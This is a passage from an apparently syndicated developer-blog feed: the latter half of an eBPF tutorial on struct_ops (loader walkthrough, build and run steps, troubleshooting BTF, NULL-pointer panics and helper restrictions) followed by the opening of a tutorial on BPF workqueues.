    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt; &lt;span class="o"&gt;?&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Understanding the Userspace Code
&lt;/h3&gt;

&lt;p&gt;The userspace code orchestrates the entire process.&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Signal Handling&lt;/strong&gt;: It sets up a signal handler for &lt;code&gt;SIGINT&lt;/code&gt; and &lt;code&gt;SIGTERM&lt;/code&gt; to allow for a graceful exit. This is crucial for &lt;code&gt;struct_ops&lt;/code&gt; because we need to ensure the BPF program is detached properly.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Open and Load&lt;/strong&gt;: It uses the standard &lt;code&gt;libbpf&lt;/code&gt; skeleton API to open and load the BPF application (&lt;code&gt;struct_ops_bpf__open()&lt;/code&gt; and &lt;code&gt;struct_ops_bpf__load()&lt;/code&gt;). This loads the BPF programs and the &lt;code&gt;struct_ops&lt;/code&gt; map into the kernel.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Attach &lt;code&gt;struct_ops&lt;/code&gt;&lt;/strong&gt;: The key step is the attachment:&lt;br&gt;
&lt;/p&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="n"&gt;link&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_map__attach_struct_ops&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;skel&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;maps&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;testmod_ops&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;


&lt;p&gt;This &lt;code&gt;libbpf&lt;/code&gt; function does the heavy lifting. It takes the &lt;code&gt;struct_ops&lt;/code&gt; map from our BPF skeleton (&lt;code&gt;skel-&amp;gt;maps.testmod_ops&lt;/code&gt;) and asks the kernel to link it to the corresponding &lt;code&gt;struct_ops&lt;/code&gt; definition (which it finds by the name "bpf_testmod_ops"). If successful, the kernel invokes the &lt;code&gt;reg&lt;/code&gt; callback in our module, and the module's function pointers now point to our BPF programs. The function returns a &lt;code&gt;bpf_link&lt;/code&gt; that represents the active attachment, or &lt;code&gt;NULL&lt;/code&gt; on failure.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Triggering&lt;/strong&gt;: The &lt;code&gt;trigger_struct_ops&lt;/code&gt; function simply opens the &lt;code&gt;/proc/bpf_testmod_trigger&lt;/code&gt; file and writes a message to it. This action invokes the &lt;code&gt;trigger_write&lt;/code&gt; handler in our kernel module, which in turn calls the BPF-implemented operations.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Cleanup&lt;/strong&gt;: When the user presses Ctrl-C, the &lt;code&gt;exiting&lt;/code&gt; flag is set, the loop terminates, and &lt;code&gt;bpf_link__destroy(link)&lt;/code&gt; is called. This is the counterpart to the attach step. It detaches the BPF programs, causing the kernel to call the &lt;code&gt;unreg&lt;/code&gt; callback in our module. This cleans up the link and decrements the module's reference count, allowing it to be unloaded cleanly. If this step is skipped (e.g., by killing the process with &lt;code&gt;kill -9&lt;/code&gt;), the explicit detach never runs. The module then remains "in use" until the kernel releases the link while tearing down the process, which may not be immediate.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;h2&gt;
  
  
  Compilation and Execution
&lt;/h2&gt;

&lt;p&gt;Now that we have all three components—the kernel module, the BPF program, and the userspace loader—let's compile and run the example to see &lt;code&gt;struct_ops&lt;/code&gt; in action.&lt;/p&gt;

&lt;h3&gt;
  
  
  1. Build the Kernel Module
&lt;/h3&gt;

&lt;p&gt;First, navigate to the &lt;code&gt;module&lt;/code&gt; directory and compile the kernel module. This requires having the kernel headers installed for your current kernel version.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cd &lt;/span&gt;module
make
&lt;span class="nb"&gt;cd&lt;/span&gt; ..
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This will produce a &lt;code&gt;hello.ko&lt;/code&gt; file, which is our compiled kernel module.&lt;/p&gt;

&lt;h3&gt;
  
  
  2. Load the Kernel Module
&lt;/h3&gt;

&lt;p&gt;Load the module into the kernel using &lt;code&gt;insmod&lt;/code&gt;. This will register our &lt;code&gt;bpf_testmod_ops&lt;/code&gt; struct_ops type and create the &lt;code&gt;/proc/bpf_testmod_trigger&lt;/code&gt; file.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sudo &lt;/span&gt;insmod module/hello.ko
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;You can verify that the module loaded successfully by checking the kernel log:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;dmesg | &lt;span class="nb"&gt;tail&lt;/span&gt; &lt;span class="nt"&gt;-n&lt;/span&gt; 1
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;You should see a message like: &lt;code&gt;bpf_testmod loaded with struct_ops support&lt;/code&gt;.&lt;/p&gt;

&lt;h3&gt;
  
  
  3. Build and Run the eBPF Application
&lt;/h3&gt;

&lt;p&gt;Next, build the BPF program and the userspace loader with &lt;code&gt;make&lt;/code&gt;, then run the loader as root.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;make
&lt;span class="nb"&gt;sudo&lt;/span&gt; ./struct_ops
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Upon running, the userspace application will:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt; Load the BPF programs.&lt;/li&gt;
&lt;li&gt; Attach the BPF implementation to the &lt;code&gt;bpf_testmod_ops&lt;/code&gt; struct_ops.&lt;/li&gt;
&lt;li&gt; Write to &lt;code&gt;/proc/bpf_testmod_trigger&lt;/code&gt; to invoke the BPF functions.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;You should see output in your terminal like this:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Successfully loaded and attached BPF struct_ops!
Triggering struct_ops callbacks...
Triggered struct_ops successfully! Check dmesg for output.

Press Ctrl-C to exit...
Triggered struct_ops again...
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  4. Check the Kernel Log for BPF Output
&lt;/h3&gt;

&lt;p&gt;While the userspace program is running, open another terminal and watch the kernel log to see the output from our BPF programs.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sudo &lt;/span&gt;dmesg &lt;span class="nt"&gt;-w&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



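&lt;p&gt;Every time the proc file is written to, you should see the module's messages alongside those printed by the BPF programs via &lt;code&gt;bpf_printk&lt;/code&gt;. Because &lt;code&gt;bpf_printk&lt;/code&gt; writes to the kernel trace buffer, check &lt;code&gt;/sys/kernel/debug/tracing/trace_pipe&lt;/code&gt; if the BPF lines do not show up in &lt;code&gt;dmesg&lt;/code&gt; on your system:&lt;br&gt;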
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;[ ... ] bpf_testmod_ops registered
[ ... ] Calling struct_ops callbacks:
[ ... ] BPF test_1 called!
[ ... ] test_1() returned: 42
[ ... ] BPF test_2 called: 10 + 20 = 30
[ ... ] test_2(10, 20) returned: 30
[ ... ] BPF test_3 called with buffer length 21
[ ... ] Buffer content: 'Hell'
[ ... ] Full buffer: Hello from userspace!
[ ... ] test_3() called with buffer
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This output confirms that the calls from the kernel module are being correctly dispatched to our BPF programs.&lt;/p&gt;

&lt;h3&gt;
  
  
  5. Clean Up
&lt;/h3&gt;

&lt;p&gt;When you are finished, press &lt;code&gt;Ctrl-C&lt;/code&gt; in the terminal running &lt;code&gt;./struct_ops&lt;/code&gt;. The program will gracefully detach the BPF link. Then, you can unload the kernel module.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sudo &lt;/span&gt;rmmod hello
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Finally, clean up the build artifacts:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;make clean
&lt;span class="nb"&gt;cd &lt;/span&gt;module
make clean
&lt;span class="nb"&gt;cd&lt;/span&gt; ..
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Note on Unloading the Module&lt;/strong&gt;: Gracefully stopping the userspace program is important. It ensures &lt;code&gt;bpf_link__destroy()&lt;/code&gt; is called, which allows the kernel module's reference count to be decremented. If the userspace process is killed abruptly (e.g., with &lt;code&gt;kill -9&lt;/code&gt;), the kernel module may remain "in use," and &lt;code&gt;rmmod&lt;/code&gt; will fail until the kernel has released the BPF link as part of tearing down the process, which may not happen immediately. If &lt;code&gt;rmmod&lt;/code&gt; reports that the module is in use, wait a moment and retry.&lt;/p&gt;

&lt;h2&gt;
  
  
  Troubleshooting Common Issues
&lt;/h2&gt;

&lt;p&gt;When working with advanced features like &lt;code&gt;struct_ops&lt;/code&gt;, which involve kernel modules, BTF, and the BPF verifier, you may encounter some tricky issues. This section covers common problems and their solutions, based on the development process of this example.&lt;/p&gt;

&lt;h3&gt;
  
  
  Issue 1: Failed to find BTF for &lt;code&gt;struct_ops&lt;/code&gt;
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Symptom:&lt;/strong&gt; The userspace loader fails with an error like:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;libbpf: failed to find BTF info for struct_ops/bpf_testmod_ops
Failed to attach struct_ops
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Root Cause:&lt;/strong&gt; This error means the kernel module (&lt;code&gt;hello.ko&lt;/code&gt;) was compiled without the necessary BTF (BPF Type Format) information. The BPF system relies on BTF to understand the structure and types defined in the module, which is essential for linking the BPF program to the &lt;code&gt;struct_ops&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Solution:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Ensure &lt;code&gt;vmlinux&lt;/code&gt; with BTF is available:&lt;/strong&gt; The kernel build system needs access to the &lt;code&gt;vmlinux&lt;/code&gt; file corresponding to your running kernel to generate BTF for external modules. This file is often not available by default. You may need to copy it from &lt;code&gt;/sys/kernel/btf/vmlinux&lt;/code&gt; or build it from your kernel source. A common location for the build system to look is &lt;code&gt;/lib/modules/$(uname -r)/build/vmlinux&lt;/code&gt;.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Ensure &lt;code&gt;pahole&lt;/code&gt; is up-to-date:&lt;/strong&gt; BTF generation depends on the &lt;code&gt;pahole&lt;/code&gt; tool (part of the &lt;code&gt;dwarves&lt;/code&gt; package). Older versions of &lt;code&gt;pahole&lt;/code&gt; may lack the features needed for modern BTF generation. Ensure you have &lt;code&gt;pahole&lt;/code&gt; v1.16 or newer. If your distribution's version is too old, you may need to compile it from source.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Rebuild the module:&lt;/strong&gt; After ensuring the dependencies are met, rebuild the kernel module. The &lt;code&gt;Makefile&lt;/code&gt; for this example already includes the &lt;code&gt;-g&lt;/code&gt; flag, which instructs the compiler to generate debug information that &lt;code&gt;pahole&lt;/code&gt; uses to create BTF.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
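
&lt;p&gt;The version requirement in step 2 can be checked mechanically. The sketch below compares a version string of the form &lt;code&gt;vMAJOR.MINOR&lt;/code&gt; against a minimum; it assumes that this is the format printed by &lt;code&gt;pahole --version&lt;/code&gt;, and the helper name &lt;code&gt;pahole_version_at_least&lt;/code&gt; is hypothetical.&lt;/p&gt;

```c
#include <stdio.h>

/*
 * Hypothetical helper: return 1 if a version string such as "v1.25"
 * is at least min_major.min_minor, 0 if it is older, and -1 if the
 * string cannot be parsed.
 */
static int pahole_version_at_least(const char *s, int min_major, int min_minor)
{
    int major, minor;

    if (*s == 'v')
        s++;                        /* accept an optional leading 'v' */
    if (sscanf(s, "%d.%d", &major, &minor) != 2)
        return -1;

    /* Compare the major number first, then fall back to the minor. */
    if (major != min_major)
        return major > min_major;
    return minor >= min_minor;
}
```

&lt;p&gt;For the threshold mentioned above, the call would be &lt;code&gt;pahole_version_at_least(version, 1, 16)&lt;/code&gt;. Comparing the two numbers separately avoids the classic mistake of treating &lt;code&gt;1.9&lt;/code&gt; as newer than &lt;code&gt;1.16&lt;/code&gt;.&lt;/p&gt;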

&lt;p&gt;You can verify that BTF information is present in your module with &lt;code&gt;readelf&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;readelf &lt;span class="nt"&gt;-S&lt;/span&gt; module/hello.ko | &lt;span class="nb"&gt;grep&lt;/span&gt; .BTF
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;You should see sections named &lt;code&gt;.BTF&lt;/code&gt; and &lt;code&gt;.BTF.ext&lt;/code&gt;, indicating that BTF data has been embedded.&lt;/p&gt;

&lt;h3&gt;
  
  
  Issue 2: Kernel Panic on Module Load
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Symptom:&lt;/strong&gt; The system crashes (kernel panic) immediately after you run &lt;code&gt;sudo insmod module/hello.ko&lt;/code&gt;. The &lt;code&gt;dmesg&lt;/code&gt; log might show a &lt;code&gt;NULL pointer dereference&lt;/code&gt; inside &lt;code&gt;register_bpf_struct_ops&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Root Cause:&lt;/strong&gt; The kernel's &lt;code&gt;struct_ops&lt;/code&gt; registration logic expects certain callback pointers in the &lt;code&gt;bpf_struct_ops&lt;/code&gt; structure to be non-NULL. In older kernel versions or certain configurations, if callbacks like &lt;code&gt;.verifier_ops&lt;/code&gt;, &lt;code&gt;.init&lt;/code&gt;, or &lt;code&gt;.init_member&lt;/code&gt; are missing, the kernel may dereference a NULL pointer, causing a panic. The kernel's code doesn't always perform defensive NULL checks.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Solution:&lt;/strong&gt; Always set every required member in your &lt;code&gt;bpf_struct_ops&lt;/code&gt; definition, even if the callbacks are only minimal stubs.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="c1"&gt;// In module/hello.c&lt;/span&gt;
&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_verifier_ops&lt;/span&gt; &lt;span class="n"&gt;bpf_testmod_verifier_ops&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;is_valid_access&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_testmod_ops_is_valid_access&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;get_func_proto&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_testmod_ops_get_func_proto&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;

&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_struct_ops&lt;/span&gt; &lt;span class="n"&gt;bpf_testmod_ops_struct_ops&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;verifier_ops&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;bpf_testmod_verifier_ops&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;  &lt;span class="c1"&gt;// REQUIRED&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;init&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_testmod_ops_init&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;              &lt;span class="c1"&gt;// REQUIRED&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;init_member&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_testmod_ops_init_member&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="c1"&gt;// REQUIRED&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;reg&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_testmod_ops_reg&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;unreg&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_testmod_ops_unreg&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="cm"&gt;/* ... */&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;By explicitly setting these members, you prevent the kernel from dereferencing a NULL pointer during registration.&lt;/p&gt;

&lt;h3&gt;
  
  
  Issue 3: BPF Program Fails to Load with "Invalid Argument"
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Symptom:&lt;/strong&gt; The userspace loader fails with an error indicating that a BPF helper function is not allowed.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;libbpf: prog 'bpf_testmod_test_1': BPF program load failed: Invalid argument
program of this type cannot use helper bpf_trace_printk#6
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Root Cause:&lt;/strong&gt; BPF programs of type &lt;code&gt;struct_ops&lt;/code&gt; run in a different kernel context than tracing programs (like kprobes or tracepoints). As a result, they are subject to a different, often more restrictive, set of allowed helper functions. The &lt;code&gt;bpf_trace_printk&lt;/code&gt; helper (which the &lt;code&gt;bpf_printk&lt;/code&gt; macro wraps) is a tracing helper and is not allowed by default in &lt;code&gt;struct_ops&lt;/code&gt; programs.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Solution:&lt;/strong&gt; While you can't use &lt;code&gt;bpf_printk&lt;/code&gt; by default, you can explicitly allow it for your &lt;code&gt;struct_ops&lt;/code&gt; type. This is done in the kernel module by implementing the &lt;code&gt;.get_func_proto&lt;/code&gt; callback in your &lt;code&gt;bpf_verifier_ops&lt;/code&gt;.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="c1"&gt;// In module/hello.c&lt;/span&gt;
&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_func_proto&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;
&lt;span class="nf"&gt;bpf_testmod_ops_get_func_proto&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;enum&lt;/span&gt; &lt;span class="n"&gt;bpf_func_id&lt;/span&gt; &lt;span class="n"&gt;func_id&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                   &lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_prog&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;prog&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="cm"&gt;/* Use base func proto which includes trace_printk and other basic helpers */&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;bpf_base_func_proto&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;func_id&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;prog&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_verifier_ops&lt;/span&gt; &lt;span class="n"&gt;bpf_testmod_verifier_ops&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;is_valid_access&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_testmod_ops_is_valid_access&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;get_func_proto&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_testmod_ops_get_func_proto&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="c1"&gt;// Add this line&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The &lt;code&gt;bpf_base_func_proto&lt;/code&gt; function provides access to a set of common, basic helpers, including &lt;code&gt;bpf_trace_printk&lt;/code&gt;. By adding this to our verifier operations, we tell the BPF verifier that programs attached to &lt;code&gt;bpf_testmod_ops&lt;/code&gt; are permitted to use these helpers. This makes debugging with &lt;code&gt;bpf_printk&lt;/code&gt; possible.&lt;/p&gt;
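
&lt;p&gt;Once the helper is allowed, &lt;code&gt;bpf_printk&lt;/code&gt; output lands in the kernel trace buffer. Here is a minimal sketch for reading it, assuming tracefs is mounted at &lt;code&gt;/sys/kernel/debug/tracing&lt;/code&gt; (some systems use &lt;code&gt;/sys/kernel/tracing&lt;/code&gt; instead) and that each line carries the usual &lt;code&gt;bpf_trace_printk:&lt;/code&gt; marker. The function name &lt;code&gt;printk_messages&lt;/code&gt; is hypothetical.&lt;/p&gt;

```shell
#!/bin/sh
# printk_messages: read trace lines on stdin and print only the text
# that follows the "bpf_trace_printk: " marker; other lines are dropped.
printk_messages() {
    sed -n 's/.*bpf_trace_printk: //p'
}

# Typical use (requires root; blocks until interrupted):
#   sudo cat /sys/kernel/debug/tracing/trace_pipe | printk_messages
```

&lt;p&gt;Filtering on the marker hides unrelated trace events, which helps when other tracers are active on the same machine.&lt;/p&gt;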

&lt;h2&gt;
  
  
  Summary
&lt;/h2&gt;

&lt;p&gt;In this tutorial, we explored the powerful capabilities of BPF &lt;code&gt;struct_ops&lt;/code&gt; by moving beyond common examples. We demonstrated a robust pattern for extending the kernel: creating a minimal kernel module to define a new, BPF-programmable subsystem interface, and then providing the full, complex implementation in a safe, updatable BPF program. This approach combines the extensibility of kernel modules with the safety and flexibility of eBPF.&lt;/p&gt;

&lt;p&gt;We saw how the kernel module registers a &lt;code&gt;struct_ops&lt;/code&gt; type, how the BPF program implements the required functions, and how a userspace loader attaches this implementation and triggers its execution. This architecture opens the door to implementing a wide range of kernel-level features in BPF, from custom network protocols and security policies to new filesystem behaviors, all while maintaining system stability and avoiding the need to recompile the kernel.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;If you'd like to dive deeper into eBPF, check out our tutorial repository at &lt;a href="https://github.com/eunomia-bpf/bpf-developer-tutorial" rel="noopener noreferrer"&gt;https://github.com/eunomia-bpf/bpf-developer-tutorial&lt;/a&gt; or visit our website at &lt;a href="https://eunomia.dev/tutorials/" rel="noopener noreferrer"&gt;https://eunomia.dev/tutorials/&lt;/a&gt;.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  References
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Kernel Source for &lt;code&gt;struct_ops&lt;/code&gt;&lt;/strong&gt;: The implementation can be found in &lt;code&gt;kernel/bpf/bpf_struct_ops.c&lt;/code&gt; in the Linux source tree.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Kernel Test Module for &lt;code&gt;struct_ops&lt;/code&gt;&lt;/strong&gt;: The official kernel self-test module provides a reference implementation: &lt;code&gt;tools/testing/selftests/bpf/test_kmods/bpf_testmod.c&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;BPF Documentation&lt;/strong&gt;: The official BPF documentation in the kernel source: &lt;a href="https://www.kernel.org/doc/html/latest/bpf/" rel="noopener noreferrer"&gt;https://www.kernel.org/doc/html/latest/bpf/&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>ebpf</category>
      <category>structops</category>
      <category>kernel</category>
    </item>
    <item>
      <title>eBPF Tutorial: BPF Workqueues for Asynchronous Sleepable Tasks</title>
      <dc:creator>云微</dc:creator>
      <pubDate>Tue, 20 Jan 2026 07:20:47 +0000</pubDate>
      <link>https://forem.com/yunwei37/ebpf-tutorial-bpf-workqueues-for-asynchronous-sleepable-tasks-58nb</link>
      <guid>https://forem.com/yunwei37/ebpf-tutorial-bpf-workqueues-for-asynchronous-sleepable-tasks-58nb</guid>
      <description>&lt;p&gt;Ever needed your eBPF program to sleep, allocate memory, or wait for device I/O? Traditional eBPF programs run in restricted contexts where blocking operations are forbidden because they could hang or crash the system. But what if your HID device needs timing delays between injected key events, or your cleanup routine needs to sleep while freeing resources?&lt;/p&gt;

&lt;p&gt;This is what &lt;strong&gt;BPF Workqueues&lt;/strong&gt; enable. Created by Benjamin Tissoires at Red Hat in 2024 for HID-BPF device handling, workqueues let you schedule asynchronous work that runs in process context where sleeping and blocking operations are allowed. In this tutorial, we'll explore why workqueues were created, how they differ from timers, and build a complete example demonstrating async callback execution.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;The complete source code: &lt;a href="https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/features/bpf_wq" rel="noopener noreferrer"&gt;https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/features/bpf_wq&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  Introduction to BPF Workqueues: Solving the Sleep Problem
&lt;/h2&gt;

&lt;h3&gt;
  
  
  The Problem: When eBPF Can't Sleep
&lt;/h3&gt;

&lt;p&gt;Before BPF workqueues existed, developers had &lt;code&gt;bpf_timer&lt;/code&gt; for deferred execution. Timers work great for scheduling callbacks after a delay, perfect for updating counters or triggering periodic events. But there's a fundamental limitation that made timers unusable for certain critical use cases: &lt;strong&gt;bpf_timer runs in softirq (software interrupt) context&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Softirq context has strict rules enforced by the kernel. You cannot sleep or wait for I/O - any attempt to do so can cause kernel panics or deadlocks. You cannot allocate memory using &lt;code&gt;kzalloc()&lt;/code&gt; with the &lt;code&gt;GFP_KERNEL&lt;/code&gt; flag because the allocation might need to sleep while waiting for pages. You cannot communicate with hardware devices that require waiting for responses. Essentially, you cannot perform any blocking operation that might cause the CPU to wait.&lt;/p&gt;

